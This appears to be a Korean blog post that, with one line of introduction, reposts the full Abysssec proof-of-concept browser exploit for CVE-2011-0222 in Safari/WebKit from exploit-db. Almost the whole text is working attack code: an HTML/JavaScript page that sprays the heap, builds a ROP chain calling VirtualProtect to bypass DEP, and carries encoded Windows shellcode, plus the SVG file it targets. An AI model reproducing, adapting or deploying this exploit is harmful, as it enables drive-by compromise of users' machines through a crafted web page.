악성코드 유포에 이용될수도 있을거 같아 기록해 둡니다.
http://www.exploit-db.com/exploits/17575/
<html>
<head>
<script>
/*
Abysssec Public Advisory
apple killed one of our 0day no point to keep it private anymore :(
there is another version of exploit using POPup and thats more reliable but as you know safari block pop up by default so we found a cool way to bypass it and stand alone module .
this exploiting using ROP to bypass permanent DEP.
note : Change spray range if not work on your machine.
CVE-2011-0222 :
WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash)
via a crafted web site a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.
Tested on windows XP SP3 and safari 5.0.5
feel free to contact us at : info [at] abysssec.com
and follow @abysssec for updates
*/
var cur_id;
var object_whiteList = {'document':1, 'rootElement':1, 'preserveAspectRatio':1,'baseVal':1, 'align':1 };
function crash(target)
{
var members = [];
for (var name in target) members.push(name);
for (var num in members)
{
var name = members[num];
if(object_whiteList[name] != 1)
continue;
var cur_value = null;
cur_value = eval('target.' + name);
if (typeof cur_value == 'object' )
crash(cur_value);
}
};
function toggle_gc() {
for (var i = 0; i < 10000; i++) {
var s = new String("AAAA" + Math.random());
eval("gc_string = s");
}
}
function spray(size, n, payload)
{
var string_size = size / 2;
var str = payload;
var c = unescape('%u4545%u4545');
while (str.length < string_size)
str += c;
var h1 = [];
h1[0] = str.substring(0, string_size)
for( i = 1; i <= n; i++)
h1[i] = unescape(h1[0])
};
var t1;
var state = 0;
function event_loop()
{
if(state == 0)
crash( t1);
else
{ var payload = unescape('%u0004%u7fc0');
spray(32, 5000, payload);
}
state = (state + 1) % 2;
setTimeout('event_loop()', 10);
}
function run_tests()
{
toggle_gc();
var payload = unescape('%u0004%u7fc0%u000c%u7fc0'
+ '%uB1C1%u7C9F' // mov esp, [ecx] | some instruction | ret (stackPivot)
+ '%u0010%u7fc0%u4242%u4242'
+ '%uD53A%u7C96' // pop ecx | ret
+ '%u1AD4%u7C80' // virtualProtect
+ '%u29D2%u7C83' // mov eax, ecx | ret
+ '%u99DE%u7642' // call eax | pop ecx | ret
+ '%u003c%u7fc0' // shellcode Address
+ '%u2000%u0000' // size
+ '%u0040%u0000' // permission
+ '%u0034%u7fc0'
+ '%u6666%u6666'
+ '%u003c%u7fc0');
var shellcode = unescape("%u9090%u8166%ufce4%u31ff%u56f6%u8b64%u3076%u768b%u8b0c%u1c76%u6e8b%u8b08%u8b36%u3c5d%u5c8b%u781d%ueb01%u4b8b%u6718%uece3%u7b8b%u0120%u8bef%u8f7c%u01fc%u31ef%u99c0%u1732%uc166%u01ca%u75ae%u66f7%ufa81%uf510%ue2e0%ucc75%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%u6897%u652e%u6578%u6368%u6c61%u5463%u0487%u5024%ud5ff");
payload += shellcode;
spray(300,20000, payload);
t1 = window.open('target.svg', 't1');
setTimeout('event_loop()', 1000);
}
</script>
</head>
<body onload="run_tests()">
<svg></svg>
</body>
</html>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="100%" height="100%" version="1.1" xmlns="http://www.w3.org/2000/svg">
</svg>